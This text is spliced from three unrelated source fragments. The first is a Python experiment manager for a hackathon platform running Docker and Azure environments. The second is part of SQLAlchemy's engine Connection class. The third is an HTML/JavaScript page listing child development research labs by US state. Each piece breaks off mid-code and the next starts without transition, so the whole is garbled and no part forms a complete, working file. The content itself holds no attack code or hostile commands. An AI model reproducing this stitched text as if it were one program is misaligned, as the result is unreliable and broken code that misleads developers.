# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -----------------------------------------------------------------------------------
import sys
sys.path.append("..")
from hackathon import (
Component,
RequiredFeature,
)
from hackathon.constants import (
EStatus,
VERemoteProvider,
VE_PROVIDER,
PortBindingType,
VEStatus,
ReservedUser,
AVMStatus,
)
from hackathon.database.models import (
VirtualEnvironment,
DockerHostServer,
Experiment,
Hackathon,
Template,
User
)
from hackathon.azureformation.azureFormation import (
AzureFormation,
)
from hackathon.hackathon_response import (
internal_server_error,
precondition_failed,
not_found,
access_denied,
ok,
)
from hackathon.template.docker_template_unit import (
DockerTemplateUnit,
)
from hackathon.template.base_template import (
BaseTemplate,
)
import json
import random
import string
from sqlalchemy import (
and_,
)
from datetime import timedelta
from hackathon.constants import CLOUD_ECLIPSE
class ExprManager(Component):
register_manager = RequiredFeature("register_manager")
user_manager = RequiredFeature("user_manager")
hackathon_manager = RequiredFeature("hackathon_manager")
template_manager = RequiredFeature("template_manager")
docker = RequiredFeature("docker")
scheduler = RequiredFeature("scheduler")
def start_expr(self, hackathon_name, template_name, user_id):
"""
A user uses a template to start a experiment under a hackathon
:param hackathon_name:
:param template_name:
:param user_id:
:return:
"""
hack_temp = self.__check_template_status(hackathon_name, template_name)
if hack_temp is None:
return not_found('hackathon or template is not existed')
hackathon = hack_temp[0]
if not self.register_manager.is_user_registered(user_id, hackathon):
return access_denied("user not registered or not approved")
if hackathon.event_end_time < self.util.get_now():
self.log.warn("hackathon is ended. The expr starting process will be stopped")
return precondition_failed('hackathen is ended')
template = hack_temp[1]
if user_id > 0:
expr = self.__check_expr_status(user_id, hackathon, template)
if expr is not None:
return self.__report_expr_status(expr)
# new expr
return self.__start_new_expr(hackathon, template, user_id)
def heart_beat(self, expr_id):
expr = self.db.find_first_object_by(Experiment, id=expr_id, status=EStatus.RUNNING)
if expr is None:
return not_found('Experiment does not running')
expr.last_heart_beat_time = self.util.get_now()
self.db.commit()
return ok('OK')
def stop_expr(self, expr_id, force=0):
"""
:param expr_id: experiment id
:param force: 0: only stop container and release ports, 1: force stop and delete container and release ports.
:return:
"""
self.log.debug("begin to stop %d" % expr_id)
expr = self.db.find_first_object_by(Experiment, id=expr_id, status=EStatus.RUNNING)
if expr is not None:
# Docker
docker = self.docker.get_docker(expr.hackathon)
if expr.template.provider == VE_PROVIDER.DOCKER:
# stop containers
for c in expr.virtual_environments.all():
try:
self.log.debug("begin to stop %s" % c.name)
if force:
docker.delete(c.name, virtual_environment=c, container=c.container, expr_id=expr_id)
c.status = VEStatus.DELETED
else:
docker.stop(c.name, virtual_environment=c, container=c.container, expr_id=expr_id)
c.status = VEStatus.STOPPED
except Exception as e:
self.log.error(e)
self.__roll_back(expr_id)
return internal_server_error('Failed stop/delete container')
if force:
expr.status = EStatus.DELETED
else:
expr.status = EStatus.STOPPED
self.db.commit()
else:
try:
# todo support delete azure vm
hosted_docker = RequiredFeature("hosted_docker")
af = AzureFormation(hosted_docker.load_azure_key_id(expr_id))
af.stop(expr_id, AVMStatus.STOPPED_DEALLOCATED)
except Exception as e:
self.log.error(e)
return internal_server_error('Failed stopping azure')
self.log.debug("experiment %d ended success" % expr_id)
return ok('OK')
else:
return ok('expr not exist')
def get_expr_status(self, expr_id):
expr = self.db.find_first_object_by(Experiment, id=expr_id)
if expr is not None:
return self.__report_expr_status(expr)
else:
return not_found('Experiment Not found')
def get_expr_list_by_user_id(self, user_id):
return map(lambda u: u.dic(),
self.db.find_all_objects(Experiment, and_(Experiment.user_id == user_id,
Experiment.status < 5)))
def get_expr_list_by_hackathon_id(self, hackathon_id, **kwargs):
condition = self.__get_filter_condition(hackathon_id, **kwargs)
experiments = self.db.find_all_objects(Experiment, condition)
return map(lambda u: self.__get_expr_with_user_info(u), experiments)
def recycle_expr(self):
"""
recycle experiment when idle more than 24 hours
:return:
"""
self.log.debug("start checking recyclable experiment ... ")
recycle_hours = self.util.safe_get_config('recycle.idle_hours', 24)
expr_time_cond = Experiment.last_heart_beat_time + timedelta(hours=recycle_hours) > self.util.get_now()
recycle_cond = Experiment.hackathon_id.in_(self.hackathon_manager.get_recyclable_hackathon_list())
status_cond = Experiment.status == EStatus.RUNNING
r = self.db.find_first_object(Experiment, status_cond, expr_time_cond, recycle_cond)
if r is not None:
self.stop_expr(r.id)
self.log.debug("it's stopping " + str(r.id) + " inactive experiment now")
else:
self.log.debug("There is now inactive experiment now")
return
def schedule_pre_allocate_expr_job(self):
next_run_time = self.util.get_now() + timedelta(seconds=1)
self.scheduler.add_interval(feature="expr_manager",
method="pre_allocate_expr",
id="pre_allocate_expr",
next_run_time=next_run_time,
minutes=self.util.safe_get_config("pre_allocate.check_interval_minutes", 5))
def pre_allocate_expr(self):
# only deal with online hackathons
hackathon_id_list = self.hackathon_manager.get_pre_allocate_enabled_hackathon_list()
templates = self.db.find_all_objects(Template, Template.hackathon_id.in_(hackathon_id_list))
for template in templates:
try:
pre_num = self.hackathon_manager.get_pre_allocate_number(template.hackathon)
curr_num = self.db.count(Experiment,
Experiment.user_id == ReservedUser.DefaultUserID,
Experiment.template_id == template.id,
(Experiment.status == EStatus.STARTING) | (
Experiment.status == EStatus.RUNNING))
# todo test azure, config num
if template.provider == VE_PROVIDER.AZURE:
if curr_num < pre_num:
remain_num = pre_num - curr_num
start_num = self.db.count_by(Experiment,
user_id=ReservedUser.DefaultUserID,
template=template,
status=EStatus.STARTING)
if start_num > 0:
self.log.debug("there is an azure env starting, will check later ... ")
return
else:
self.log.debug(
"no starting template: %s , remain num is %d ... " % (template.name, remain_num))
self.start_expr(template.hackathon.name, template.name, ReservedUser.DefaultUserID)
break
# curr_num += 1
# self.log.debug("all template %s start complete" % template.name)
elif template.provider == VE_PROVIDER.DOCKER:
self.log.debug(
"template name is %s, hackathon name is %s" % (template.name, template.hackathon.name))
if curr_num < pre_num:
remain_num = pre_num - curr_num
self.log.debug("no idle template: %s, remain num is %d ... " % (template.name, remain_num))
self.start_expr(template.hackathon.name, template.name, ReservedUser.DefaultUserID)
# curr_num += 1
break
# self.log.debug("all template %s start complete" % template.name)
except Exception as e:
self.log.error(e)
self.log.error("check default experiment failed")
# --------------------------------------------- helper function ---------------------------------------------#
def __start_new_expr(self, hackathon, template, user_id):
# new expr
expr = self.db.add_object_kwargs(Experiment,
user_id=user_id,
hackathon_id=hackathon.id,
status=EStatus.INIT,
template_id=template.id)
self.db.commit()
curr_num = self.db.count(Experiment,
Experiment.user_id == ReservedUser.DefaultUserID,
Experiment.template == template,
(Experiment.status == EStatus.STARTING) |
(Experiment.status == EStatus.RUNNING))
if template.provider == VE_PROVIDER.DOCKER:
try:
template_dic = self.template_manager.load_template(template)
virtual_environments_list = template_dic[BaseTemplate.VIRTUAL_ENVIRONMENTS]
if curr_num != 0 and curr_num >= self.util.get_config("pre_allocate.docker"):
return
expr.status = EStatus.STARTING
self.db.commit()
map(lambda virtual_environment_dic:
self.__remote_start_container(hackathon, expr, virtual_environment_dic),
virtual_environments_list)
expr.status = EStatus.RUNNING
self.db.commit()
except Exception as e:
self.log.error(e)
self.log.error("Failed starting containers")
self.__roll_back(expr.id)
return internal_server_error('Failed starting containers')
else:
if curr_num != 0 and curr_num >= self.util.get_config("pre_allocate.azure"):
return
expr.status = EStatus.STARTING
self.db.commit()
try:
af = AzureFormation(self.docker.__load_azure_key_id(expr.id))
af.create(expr.id)
except Exception as e:
self.log.error(e)
return internal_server_error('Failed starting azure vm')
# after everything is ready, set the expr state to running
# response to caller
return self.__report_expr_status(expr)
def __report_expr_status(self, expr):
containers = self.__get_containers_by_exper(expr)
for container in containers:
# expr status(restarting or running) is not match container running status on docker host
if not self.docker.hosted_docker.check_container_status_is_normal(container):
try:
self.db.update_object(expr, status=EStatus.UNEXPECTED_ERROR)
self.db.update_object(container.virtual_environment, status=VEStatus.UNEXPECTEDERRORS)
break
except Exception as ex:
self.log.error(ex)
ret = {
"expr_id": expr.id,
"status": expr.status,
"hackathon": expr.hackathon.name,
"create_time": str(expr.create_time),
"last_heart_beat_time": str(expr.last_heart_beat_time),
}
if expr.status != EStatus.RUNNING:
return ret
# return remote clients include guacamole and cloudEclipse
remote_servers = []
for ve in expr.virtual_environments.all():
if ve.remote_provider == VERemoteProvider.Guacamole:
try:
guacamole_config = json.loads(ve.remote_paras)
guacamole_host = self.util.safe_get_config("guacamole.host", "localhost:8080")
# target url format:
# http://localhost:8080/guacamole/#/client/c/{name}?name={name}&oh={token}
name = guacamole_config["name"]
url = guacamole_host + '/guacamole/#/client/c/%s?name=%s' % (name, name)
remote_servers.append({
"name": guacamole_config["displayname"],
"url": url
})
# cloud eclipse
cloud_eclipse_url = self.__get_cloud_eclipse_url(expr)
if cloud_eclipse_url is not None:
remote_servers.append({
"name": CLOUD_ECLIPSE.CLOUD_ECLIPSE,
"url": cloud_eclipse_url
})
except Exception as e:
self.log.error(e)
if expr.status == EStatus.RUNNING:
ret["remote_servers"] = remote_servers
# return public accessible web url
public_urls = []
if expr.template.provider == VE_PROVIDER.DOCKER:
for ve in expr.virtual_environments.all():
for p in ve.port_bindings.all():
if p.binding_type == PortBindingType.CLOUD_SERVICE and p.url is not None:
hs = self.db.find_first_object_by(DockerHostServer, id=p.binding_resource_id)
url = p.url.format(hs.public_dns, p.port_from)
public_urls.append({
"name": p.name,
"url": url
})
else:
for ve in expr.virtual_environments.all():
for vm in ve.azure_virtual_machines_v.all():
ep = vm.azure_endpoints.filter_by(private_port=80).first()
url = 'http://%s:%s' % (vm.public_ip, ep.public_port)
public_urls.append({
"name": ep.name,
"url": url
})
ret["public_urls"] = public_urls
return ret
def __check_template_status(self, hackathon_name, template_name):
hackathon = self.db.find_first_object_by(Hackathon, name=hackathon_name)
if hackathon is None:
return None
template = self.db.find_first_object_by(Template, hackathon_id=hackathon.id, name=template_name)
if template is None or self.template_manager.load_template(template) is None:
return None
return [hackathon, template]
def __remote_start_container(self, hackathon, expr, virtual_environment_dic):
docker_template_unit = DockerTemplateUnit(virtual_environment_dic)
old_name = docker_template_unit.get_name()
suffix = "".join(random.sample(string.ascii_letters + string.digits, 8))
new_name = '%d-%s-%s' % (expr.id, old_name, suffix)
docker_template_unit.set_name(new_name)
self.log.debug("starting to start container: %s" % new_name)
# db entity
ve = VirtualEnvironment(provider=VE_PROVIDER.DOCKER,
name=new_name,
image=docker_template_unit.get_image_with_tag(),
status=VEStatus.INIT,
remote_provider=VERemoteProvider.Guacamole,
experiment=expr)
self.db.add_object(ve)
# start container remotely , use hosted docker or alauda docker
docker = self.docker.get_docker(hackathon)
container_ret = docker.start(docker_template_unit,
hackathon=hackathon,
virtual_environment=ve,
experiment=expr)
if container_ret is None:
self.log.error("container %s fail to run" % new_name)
| |
# engine/base.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import with_statement
import contextlib
import sys
from .interfaces import Connectable
from .interfaces import ExceptionContext
from .util import _distill_params
from .util import _distill_params_20
from .. import exc
from .. import inspection
from .. import log
from .. import util
from ..sql import compiler
from ..sql import util as sql_util
"""Defines :class:`_engine.Connection` and :class:`_engine.Engine`.
"""
_EMPTY_EXECUTION_OPTS = util.immutabledict()
class Connection(Connectable):
"""Provides high-level functionality for a wrapped DB-API connection.
**This is the SQLAlchemy 1.x.x version** of the :class:`_engine.Connection`
class. For the :term:`2.0 style` version, which features some API
differences, see :class:`_future.Connection`.
The :class:`_engine.Connection` object is procured by calling
the :meth:`_engine.Engine.connect` method of the :class:`_engine.Engine`
object, and provides services for execution of SQL statements as well
as transaction control.
The Connection object is **not** thread-safe. While a Connection can be
shared among threads using properly synchronized access, it is still
possible that the underlying DBAPI connection may not support shared
access between threads. Check the DBAPI documentation for details.
The Connection object represents a single DBAPI connection checked out
from the connection pool. In this state, the connection pool has no affect
upon the connection, including its expiration or timeout state. For the
connection pool to properly manage connections, connections should be
returned to the connection pool (i.e. ``connection.close()``) whenever the
connection is not in use.
.. index::
single: thread safety; Connection
"""
_is_future = False
_sqla_logger_namespace = "sqlalchemy.engine.Connection"
def __init__(
self,
engine,
connection=None,
close_with_result=False,
_branch_from=None,
_execution_options=None,
_dispatch=None,
_has_events=None,
):
"""Construct a new Connection."""
self.engine = engine
self.dialect = engine.dialect
self.__branch_from = _branch_from
if _branch_from:
# branching is always "from" the root connection
assert _branch_from.__branch_from is None
self._dbapi_connection = connection
self._execution_options = _execution_options
self._echo = _branch_from._echo
self.should_close_with_result = False
self.dispatch = _dispatch
self._has_events = _branch_from._has_events
else:
self._dbapi_connection = (
connection
if connection is not None
else engine.raw_connection()
)
self._transaction = self._nested_transaction = None
self.__savepoint_seq = 0
self.__in_begin = False
self.should_close_with_result = close_with_result
self.__can_reconnect = True
self._echo = self.engine._should_log_info()
if _has_events is None:
# if _has_events is sent explicitly as False,
# then don't join the dispatch of the engine; we don't
# want to handle any of the engine's events in that case.
self.dispatch = self.dispatch._join(engine.dispatch)
self._has_events = _has_events or (
_has_events is None and engine._has_events
)
assert not _execution_options
self._execution_options = engine._execution_options
if self._has_events or self.engine._has_events:
self.dispatch.engine_connect(self, _branch_from is not None)
@util.memoized_property
def _message_formatter(self):
if "logging_token" in self._execution_options:
token = self._execution_options["logging_token"]
return lambda msg: "[%s] %s" % (token, msg)
else:
return None
def _log_info(self, message, *arg, **kw):
fmt = self._message_formatter
if fmt:
message = fmt(message)
self.engine.logger.info(message, *arg, **kw)
def _log_debug(self, message, *arg, **kw):
fmt = self._message_formatter
if fmt:
message = fmt(message)
self.engine.logger.debug(message, *arg, **kw)
@property
def _schema_translate_map(self):
return self._execution_options.get("schema_translate_map", None)
def schema_for_object(self, obj):
"""Return the schema name for the given schema item taking into
account current schema translate map.
"""
name = obj.schema
schema_translate_map = self._execution_options.get(
"schema_translate_map", None
)
if (
schema_translate_map
and name in schema_translate_map
and obj._use_schema_map
):
return schema_translate_map[name]
else:
return name
def _branch(self):
"""Return a new Connection which references this Connection's
engine and connection; but does not have close_with_result enabled,
and also whose close() method does nothing.
.. deprecated:: 1.4 the "branching" concept will be removed in
SQLAlchemy 2.0 as well as the "Connection.connect()" method which
is the only consumer for this.
The Core uses this very sparingly, only in the case of
custom SQL default functions that are to be INSERTed as the
primary key of a row where we need to get the value back, so we have
to invoke it distinctly - this is a very uncommon case.
Userland code accesses _branch() when the connect()
method is called. The branched connection
acts as much as possible like the parent, except that it stays
connected when a close() event occurs.
"""
return self.engine._connection_cls(
self.engine,
self._dbapi_connection,
_branch_from=self.__branch_from if self.__branch_from else self,
_execution_options=self._execution_options,
_has_events=self._has_events,
_dispatch=self.dispatch,
)
def _generate_for_options(self):
"""define connection method chaining behavior for execution_options"""
if self._is_future:
return self
else:
c = self.__class__.__new__(self.__class__)
c.__dict__ = self.__dict__.copy()
return c
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.close()
def execution_options(self, **opt):
r""" Set non-SQL options for the connection which take effect
during execution.
For a "future" style connection, this method returns this same
:class:`_future.Connection` object with the new options added.
For a legacy connection, this method returns a copy of this
:class:`_engine.Connection` which references the same underlying DBAPI
connection, but also defines the given execution options which will
take effect for a call to
:meth:`execute`. As the new :class:`_engine.Connection` references the
same underlying resource, it's usually a good idea to ensure that
the copies will be discarded immediately, which is implicit if used
as in::
result = connection.execution_options(stream_results=True).\
execute(stmt)
Note that any key/value can be passed to
:meth:`_engine.Connection.execution_options`,
and it will be stored in the
``_execution_options`` dictionary of the :class:`_engine.Connection`.
It
is suitable for usage by end-user schemes to communicate with
event listeners, for example.
The keywords that are currently recognized by SQLAlchemy itself
include all those listed under :meth:`.Executable.execution_options`,
as well as others that are specific to :class:`_engine.Connection`.
:param autocommit: Available on: Connection, statement.
When True, a COMMIT will be invoked after execution
when executed in 'autocommit' mode, i.e. when an explicit
transaction is not begun on the connection. Note that this
is **library level, not DBAPI level autocommit**. The DBAPI
connection will remain in a real transaction unless the
"AUTOCOMMIT" isolation level is used.
.. deprecated:: 1.4 The "autocommit" execution option is deprecated
and will be removed in SQLAlchemy 2.0. See
:ref:`migration_20_autocommit` for discussion.
:param compiled_cache: Available on: Connection.
A dictionary where :class:`.Compiled` objects
will be cached when the :class:`_engine.Connection`
compiles a clause
expression into a :class:`.Compiled` object. This dictionary will
supersede the statement cache that may be configured on the
:class:`_engine.Engine` itself. If set to None, caching
is disabled, even if the engine has a configured cache size.
Note that the ORM makes use of its own "compiled" caches for
some operations, including flush operations. The caching
used by the ORM internally supersedes a cache dictionary
specified here.
:param logging_token: Available on: :class:`_engine.Connection`,
:class:`_engine.Engine`.
Adds the specified string token surrounded by brackets in log
messages logged by the connection, i.e. the logging that's enabled
either via the :paramref:`_sa.create_engine.echo` flag or via the
``logging.getLogger("sqlalchemy.engine")`` logger. This allows a
per-connection or per-sub-engine token to be available which is
useful for debugging concurrent connection scenarios.
.. versionadded:: 1.4.0b2
.. seealso::
:ref:`dbengine_logging_tokens` - usage example
:paramref:`_sa.create_engine.logging_name` - adds a name to the
name used by the Python logger object itself.
:param isolation_level: Available on: :class:`_engine.Connection`.
Set the transaction isolation level for the lifespan of this
:class:`_engine.Connection` object.
Valid values include those string
values accepted by the :paramref:`_sa.create_engine.isolation_level`
parameter passed to :func:`_sa.create_engine`. These levels are
semi-database specific; see individual dialect documentation for
valid levels.
The isolation level option applies the isolation level by emitting
statements on the DBAPI connection, and **necessarily affects the
original Connection object overall**, not just the copy that is
returned by the call to :meth:`_engine.Connection.execution_options`
method. The isolation level will remain at the given setting until
the DBAPI connection itself is returned to the connection pool, i.e.
the :meth:`_engine.Connection.close` method on the original
:class:`_engine.Connection` is called,
where an event handler will emit
additional statements on the DBAPI connection in order to revert the
isolation level change.
.. warning:: The ``isolation_level`` execution option should
**not** be used when a transaction is already established, that
is, the :meth:`_engine.Connection.begin`
method or similar has been
called. A database cannot change the isolation level on a
transaction in progress, and different DBAPIs and/or
SQLAlchemy dialects may implicitly roll back or commit
the transaction, or not affect the connection at all.
.. note:: The ``isolation_level`` execution option is implicitly
reset if the :class:`_engine.Connection` is invalidated, e.g. via
the :meth:`_engine.Connection.invalidate` method, or if | |
Cheerios</p>
<p><strong>A guided, online "give N" task is coming soon to Lookit!</strong></p>
<h4>Let your baby choose: understanding your infant's preferences</h4>
<p><img src="{settings.STATIC_URL}images/pacifier.png"></p>
<p><strong>Age range</strong>: 0 to 6 months</p>
<p><strong>What you'll need</strong>: A pacifier that your infant will suck on for about 15 minutes at a time and the operant conditioning web tool.</p>
<p>In this lab, you'll let your baby control what sound is played by sucking faster or slower on a pacifier. We recommend starting by trying to observe his or her preference for hearing music or a heartbeat. <a href="http://www.mit.edu/~kimscott/instructions.html">Instructions</a></p>
</div>
</div>
</div>
</div>"""
+ """
<script type="text/javascript">
var allLabs = {
"Alabama": [
{
'url': 'http://www.ches.ua.edu/hdfs/cdrc/',
'name': 'University of Alabama Child Development Research Center'
},
{
'url': 'http://monaelsheikh.com/',
'name': 'Auburn University Child Sleep, Health, and Development Lab'
}
],
"Alaska": [],
"Arizona": [
{
'url': 'http://web.arizona.edu/~tigger/',
'name': 'University of Arizona Child Cognition Lab (Tigger Lab)'
},
{
'url': 'http://web.arizona.edu/~tweety/',
'name': 'University of Arizona Language Development Lab (Tweety Lab)'
},
{
'url': 'http://nau.edu/SBS/IHD/Research/CDLL/',
'name': 'Northern Arizona University Child Development and Language Lab'
}
],
"Arkansas": [
{
'url': 'http://acnc.uamsweb.com/research-2/our-laboratories-2/early-diets-and-long-term-health-lab/',
'name': "Arkansas Children's Nutrition Center Growth and Development Laboratory"
}
],
"California": [
{
'url': 'http://www.csus.edu/indiv/a/alexanderk/lab.htm',
'name': 'CSU Sacramento Cognitive Development Lab'
},
{
'url': 'http://www-psych.stanford.edu/~babylab/',
'name': "Stanford's Center for Infant Studies"
},
{
'url': 'http://bungelab.berkeley.edu/participate/',
'name': 'UC Berkeley Building Blocks of Cognition Lab'
},
{
'url': 'http://babycenter.berkeley.edu/',
'name': 'UC Berkeley Infant Studies Center'
},
{
'url': 'http://psychology.berkeley.edu/participant-recruitment/rsvp-research-subject-volunteer-pool',
'name': 'UC Berkeley Psychology Department (list of studies)'
},
{
'url': 'http://oakeslab.ucdavis.edu/',
'name': 'UC Davis Infant Cognition Lab'
},
{
'url': ' http://languagelearninglab.dss.ucdavis.edu/',
'name': 'UC Davis Language Learning Lab'
},
{
'url': ' http://riveralab.ucdavis.edu/',
'name': 'UC Davis Neurocognitive Development Lab'
},
{
'url': 'http://www.cogsci.uci.edu/cogdev/information.html',
'name': 'UC Irvine Sarnecka Cognitive Development Lab'
},
{
'url': 'http://babytalk.psych.ucla.edu/home.htm',
'name': 'UCLA Language and Cognitive Development Lab'
},
{
'url': 'http://www.ccl.ucr.edu/',
'name': 'UC Riverside Childhood Cognition Lab'
},
{
'url': 'https://labs.psych.ucsb.edu/german/tamsin/',
'name': 'UCSB Cognition & Development Laboratory'
},
{
'url': 'http://www-cogsci.ucsd.edu/~deak/cdlab/',
'name': 'UCSD Cognitive Development Lab'
},
{
'url': 'http://dornsife.usc.edu/labs/mid-la/participate/',
'name': 'USC Minds in Development Lab'
}
],
"Colorado": [
{
'url': 'http://sleep.colorado.edu/',
'name': 'UC Boulder Sleep and Development Lab'
},
{
'url': 'http://www.ucdenver.edu/academics/colleges/medicalschool/departments/psychiatry/Research/developmentalresearch/Pages/Overview.aspx',
'name': 'University of Colorado Denver Developmental Psychiatry Research Group'
},
{
'url': 'http://www.du.edu/psychology/child_health_and_development/',
'name': 'University of Colorado Denver Child Health & Development Lab'
},
{
'url': 'http://psych.colorado.edu/~cdc/whoweare.htm',
'name': 'University of Colorado Denver Cognitive Development Center'
}
],
"Connecticut": [
{
'url': 'http://cogdev.research.wesleyan.edu/',
'name': 'Wesleyan University Cognitive Development Labs'
},
{
'url': 'http://infantandchild.yale.edu/',
'name': 'Yale Infant and Child Research'
},
{
'url': 'http://candlab.yale.edu/',
'name': 'Yale Clinical Affective Neuroscience & Development Lab'
},
{
'url': 'https://medicine.yale.edu/lab/mcpartland/',
'name': 'McPartland Lab at Yale - Clinical Neuroscience of Autism Spectrum Disorder'
}
],
"Delaware": [
{
'url': 'http://www.childsplay.udel.edu/',
'name': "University of Delaware Child's Play, Learning and Development Lab"
}
],
"Florida": [
{
'url': 'http://casgroup.fiu.edu/dcn/pages.php?id=3636',
'name': 'FIU Developmental Cognitive Neuroscience Lab'
},
{
'url': 'http://online.sfsu.edu/devpsych/fair/index.html',
'name': 'FSU Family Interaction Research Lab'
},
{
'url': 'http://psy2.fau.edu/~lewkowicz/cdlfau/default.htm',
'name': 'FAU Child Development Lab'
},
{
'url': 'http://infantlab.fiu.edu/Infant_Lab.htm',
'name': 'FIU Infant Development Lab'
}
],
"Georgia": [
{
'url': 'http://www.gcsu.edu/psychology/currentresearch.htm#Participate',
'name': 'Georgia College Psychology Department'
}
],
"Hawaii": [
{
'url': 'http://www.psychology.hawaii.edu/concentrations/developmental-psychology.html',
'name': 'University of Hawaii Developmental Psychology'
}
],
"Idaho": [],
"Illinois": [
{
'url': 'http://internal.psychology.illinois.edu/~acimpian/',
'name': 'University of Illinois Cognitive Development Lab'
},
{
'url': 'http://internal.psychology.illinois.edu/infantlab/',
'name': 'University of Illinois Infant Cognition Lab'
},
{
'url': 'http://bradfordpillow.weebly.com/cognitive-development-lab.html',
'name': 'Northern Illinois University Cognitive Development Lab'
},
{
'url': 'http://www.childdevelopment.northwestern.edu/',
'name': "Northwestern University's Project on Child Development"
},
{
'url': 'http://woodwardlab.uchicago.edu/Home.html',
'name': 'University of Chicago Infant Learning and Development Lab'
}
],
"Indiana": [
{
'url': 'http://www.iub.edu/~cogdev/',
'name': 'Indiana University Cognitive Development Lab'
},
{
'url': 'http://www.psych.iupui.edu/Users/kjohnson/cogdevlab/INDEX.HTM',
'name': 'IUPUI Cognitive Development Lab'
},
{
'url': 'http://www.evansville.edu/majors/cognitivescience/language.cfm',
'name': 'University of Evansville Language and Cognitive Development Laboratory'
}
],
"Iowa": [
{
'url': 'http://www.medicine.uiowa.edu/psychiatry/cognitivebraindevelopmentlaboratory/',
'name': 'University of Iowa Cognitive Brain Development Laboratory'
}
],
"Kansas": [
{
'url': 'http://www2.ku.edu/~lsi/labs/neurocognitive_lab/staff.shtml',
'name': 'KU Neurocognitive Development of Autism Research Laboratory'
},
{
'url': 'http://healthprofessions.kumc.edu/school/research/carlson/index.html',
'name': 'KU Maternal and Child Nutrition and Development Laboratory'
},
{
'url': 'http://greenhoot.wordpress.com/meet-the-research-team/',
'name': 'KU Memory and Development Lab'
}
],
"Minnesota": [
{
'url': 'http://www.cehd.umn.edu/icd/research/seralab/',
'name': 'University of Minnesota Language and Cognitive Development Lab'
},
{
'url': 'http://www.cehd.umn.edu/icd/research/cdnlab/',
'name': 'University of Minnesota Cognitive Development & Neuroimaging Lab'
},
{
'url': 'http://www.cehd.umn.edu/icd/research/carlson/',
'name': 'University of Minnesota Carlson Child Development Lab'
}
],
"Kentucky": [
{
'url': 'http://babythinker.org',
'name': 'University of Louisville Infant Cognition Lab'
},
{
'url': 'http://www.wku.edu/psychological-sciences/labs/cognitive_development/index.php',
'name': 'Western Kentucky University Cognitive Development Lab'
}
],
"Louisana": [],
"Maine": [
{
'url': 'http://people.usm.maine.edu/bthompso/Site/Development%20Lab.html',
'name': 'USM Human Development Lab'
},
{
'url': 'http://www.colby.edu/psychology/labs/cogdev1/LabAlumni.html',
'name': 'Colby Cognitive Development Lab'
}
],
"Maryland": [
{
'url': 'http://education.umd.edu/HDQM/labs/Fox/',
'name': 'University of Maryland Child Development Lab'
},
{
'url': 'http://ncdl.umd.edu/',
'name': 'University of Maryland Neurocognitive Development Lab'
}
],
"Massachusetts": [
{
'url': 'http://eccl.mit.edu/',
'name': 'MIT Early Childhood Cognition Lab'
},
{
'url': 'http://gablab.mit.edu/',
'name': 'MIT Gabrieli Lab'
},
{
'url': 'http://saxelab.mit.edu/people.php',
'name': 'MIT Saxelab Social Cognitive Neuroscience Lab'
},
{
'url': 'https://software.rc.fas.harvard.edu/lds/',
'name': 'Harvard Laboratory for Developmental Sciences'
},
{
'url': 'http://www.bu.edu/cdl/',
'name': 'Boston University Child Development Labs'
},
{
'url': 'babies.umb.edu',
'name': 'UMass Boston Baby Lab'
},
{
'url': 'http://people.umass.edu/lscott/lab.htm',
'name': 'UMass Amherst Brain, Cognition, and Development Lab'
},
{
'url': 'http://www.northeastern.edu/berentlab/research/infant/',
'name': 'Northeastern Infant Phonology Lab'
}
],
"Michigan": [
{
'url': 'http://www.educ.msu.edu/content/default.asp?contentID=903',
'name': 'MSU Cognitive Development Lab'
},
{
'url': 'http://ofenlab.wayne.edu/people.php',
'name': 'Wayne State University Cognitive Brain Development Lab'
}
],
"Mississippi": [],
"Missouri": [
{
'url': 'http://www.artsci.wustl.edu/~children/',
'name': 'Washington University Cognition and Development Lab'
},
{
'url': 'http://mumathstudy.missouri.edu/#content',
'name': 'University of Missouri-Columbia Math Study'
}
],
"Montana": [
{
'url': 'http://hs.umt.edu/psychology/severson/',
'name': 'The Minds Lab at University of Montana '
},
{
'url': 'http://www.montana.edu/wwwpy/brooker/html/meet.html',
'name': 'Montana State University DOME Lab'
}
],
"Nebraska": [
{
'url': 'http://www.boystownhospital.org/research/clinicalbehavioralstudies/Pages/LanguageDevelopmentLaboratory.aspx',
'name': 'Boys Town National Research Hospital Language Development Laboratory'
},
{
'url': 'http://research.unl.edu/dcn/',
'name': 'University of Nebraska-Lincoln Developmental Cognitive Neuroscience Laboratory'
}
],
"Nevada": [
{
'url': 'http://www.unl.edu/dbrainlab/',
'name': 'University of Nebraska-Lincoln Developmental Brain Lab'
}
],
"New Hampshire": [
{
'url': 'http://cola.unh.edu/news/frl',
'name': 'University of New Hampshire Family Research Lab'
}
],
"New Jersey": [
{
'url': 'http://www.shu.edu/academics/gradmeded/ms-speech-language-pathology/dlc-lab.cfm',
'name': 'Seton Hall University Developmental Language and Cognition Laboratory'
},
{
'url': 'http://www.ramapo.edu/sshs/childlab/',
'name': 'Ramapo College Child Development Lab'
},
{
'url': 'http://ruccs.rutgers.edu/~aleslie/',
'name': 'Rutgers University Cognitive Development Lab'
},
{
'url': 'http://babylab.rutgers.edu/HOME.html',
'name': 'Rutgers University Infancy Studies Lab'
},
{
'url': 'http://ruccs.rutgers.edu/languagestudies/people.html',
'name': 'Rutgers University Lab for Developmental Language Studies'
}
],
"New Mexico": [],
"New York": [
{
'url': 'http://www.columbia.edu/cu/needlab/',
'name': 'Columbia Neurocognition, Early Experience, and Development (NEED) Lab'
},
{
'url': 'https://www.facebook.com/pages/Child-Development-Lab-the-City-University-of-New-York/42978619994',
'name': 'CUNY Child Development Lab'
}
],
"North Carolina": [
{
'url': 'http://people.uncw.edu/nguyens/',
'name': 'UNCW Cognitive Development Lab'
}
],
"North Dakota": [
{
'url': 'http://www.cvcn.psych.ndsu.nodak.edu/labs/woods/',
'name': 'NDSU Infant Cognitive Development Lab'
}
],
"Ohio": [
{
'url': 'http://cogdev.cog.ohio-state.edu/',
'name': 'OSU Cognitive Development Lab'
},
{
'url': 'http://www.ohio.edu/chsp/rcs/csd/research/dplab.cfm',
'name': 'Ohio University Developmental Psycholinguistics Lab'
}
],
"Oklahoma": [],
"Oregon": [
{
